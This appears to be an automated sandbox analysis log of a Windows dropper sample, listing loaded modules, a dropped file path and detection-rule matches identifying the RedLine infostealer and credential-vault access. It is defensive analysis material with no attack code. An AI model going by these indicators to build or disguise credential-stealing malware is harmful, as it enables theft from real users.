Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section loaded: ??l.dll

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
